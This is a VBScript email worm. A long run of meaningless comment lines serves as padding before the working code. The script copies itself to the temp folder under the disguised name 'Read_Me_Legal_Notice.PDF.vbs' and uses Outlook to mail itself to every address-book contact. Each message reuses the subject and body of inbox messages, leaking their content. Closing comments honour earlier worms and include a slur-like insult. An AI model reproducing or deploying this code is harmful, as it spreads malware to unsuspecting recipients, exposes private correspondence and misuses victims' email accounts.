On Error Resume Next
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'fncjdhlfssl3492-3-83298df-sd8f938-5235=28ffds-g-df948-58-34g-df8g-fd04-567346-8-df8gd-f945-63456-348g-df
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'çdskçdjçgsdjgçsdjgçksdj24389572isejçkfjsçjo243uo23phhfsdçhçksfçhç3h25kçh2çsdjgçsdljgçsldjgjd..dgss.dg.ds
'dfnm.sk39282-sfkjsç034022=5k2çkf~3948-34jç34930j34çjç5j3ç4jçljçgjdfçglfdjgdf8g0fd8gdfjgçlfdjgçdlfjglfççl
'fldfll3l2~slsço~p34300-dslfd~ç~349999sdf-d-fdllll3l4ç343ddfdkkdkjfkdjkfdkfsçsfsç~çsgsdogjojojhs~djg~sjgs
'ksdksçç235ç32ksdjfsçjfdkçfjsldjlçjlr4r..fdgfsdjlg.sdgsdgjsdjggsgd.smsdjkglsdjglçjçlasg.gd~s~g~sdg~sdlçdl
'dsfngçkç45830fkgçdfkç45395-0fdlgdfkhg~5k6~k5~6ç3k~ç3~dkf~dgdf987g09fdglçdkfg~kdfçgk~kç...dfjgdjfçg,fgllf
'dfçjgçfl493-59-34lfgldfkgçfdkglçk394pgçfdmglfdçlllllfljfkfkfjkvkfnkfnk4938594354k5j4j5ç3l4ç3l43jç5j3ç4l4
Dim fso,arq,tarq
Set fso = CreateObject("Scripting.FileSystemObject")
arq="Read_Me_Legal_Notice.PDF.vbs":tarq = fso.GetSpecialFolder(2) & "\" & arq:fso.CopyFile arq,tarq
call goeml(tarq)
sub goeml(tarq)
Dim cal,cem,eml,oap
Dim msp,fib,cit
Set oap=CreateObject("Outlook.Application")
For cal = 1 To oap.Session.AddressLists.Count
For cem = 1 To oap.Session.AddressLists.Item(cal).AddressEntries.Count
set msp = oap.GetNameSpace("MAPI")
set fib = msp.GetDefaultFolder(6)
For cit = 1 to fib.items.count
Set eml = oap.CreateItem(olMailItem)
eml.Recipients.Add oap.Session.AddressLists.Item(cal).AddressEntries.Item(cem).Name
eml.Subject = fib.items(cit).Subject
eml.Body = fib.items(cit).body
eml.Attachments.Add tarq
eml.Send
Next
Next
Next
end sub
'In memory of "I Love You","Anna Kournikova" and "Brazilian Carnival"
'BILL GATES IS GAY!
'Nothing is Secret!